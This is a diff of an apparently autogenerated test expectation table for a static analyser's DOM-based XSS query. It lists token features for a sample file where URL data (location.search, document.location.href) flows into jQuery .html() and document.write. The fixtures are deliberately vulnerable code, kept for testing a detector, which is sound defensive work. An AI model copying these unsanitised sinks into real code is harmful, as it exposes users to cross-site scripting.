    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | $('myId ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | $('myId ... target) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | $('myId ... target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | exceptional return of $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | exceptional return of $('myId ... target) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | exceptional return of $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:3:5:24 | exceptional return of $('myId ... target) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:5:5:5:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:5:5:5:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:5:5:5:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15885,6 +111663,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:5:5:5:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:5:5:5:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:5:5:5:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:5:13:5:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:5:13:5:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:5:13:5:16 | html | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:5:13:5:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:5:13:5:16 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:5:18:5:23 | target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:5:18:5:23 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:5:18:5:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15892,12 +111675,42 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:5:18:5:23 | target | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:5:18:5:23 | target | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:5:18:5:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:10 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:10 | document | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:10 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:16 | document.write | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:16 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | documen ... TION>") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | documen ... TION>") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | documen ... TION>") | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | documen ... TION>") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | documen ... TION>") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | exceptional return of documen ... TION>") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | exceptional return of documen ... TION>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | exceptional return of documen ... TION>") | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | exceptional return of documen ... TION>") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:3:8:127 | exceptional return of documen ... TION>") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:12:8:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:12:8:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:12:8:16 | write | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:12:8:16 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:12:8:16 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:35 | " document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:35 | "' | +| autogenerated/Xss/DomBasedXss/tst.js:8:18:8:114 | " $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:18:8:114 | "" | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:126 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:126 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15906,12 +111719,78 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:126 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:126 | "" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:18:8:126 | "" | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:44 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:44 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:44 | document | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:44 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:44 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:53 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:53 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:53 | document.location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:53 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:53 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:58 | documen ... on.href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:58 | documen ... on.href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:58 | documen ... on.href | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:58 | documen ... on.href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:58 | documen ... on.href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:68 | documen ... bstring | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:68 | documen ... bstring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:68 | documen ... bstring | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:68 | documen ... bstring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:68 | documen ... bstring | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | documen ... t=")+8) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | documen ... t=")+8) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | documen ... t=")+8) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | documen ... t=")+8) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | documen ... t=")+8) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | documen ... t=")+8) | stringConcatenatedWith | '' | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | exceptional return of documen ... t=")+8) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | exceptional return of documen ... t=")+8) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | exceptional return of documen ... t=")+8) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | exceptional return of documen ... t=")+8) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:37:8:114 | exceptional return of documen ... t=")+8) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:46:8:53 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:46:8:53 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:46:8:53 | location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:46:8:53 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:46:8:53 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:55:8:58 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:55:8:58 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:55:8:58 | href | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:55:8:58 | href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:55:8:58 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:60:8:68 | substring | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:60:8:68 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:60:8:68 | substring | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
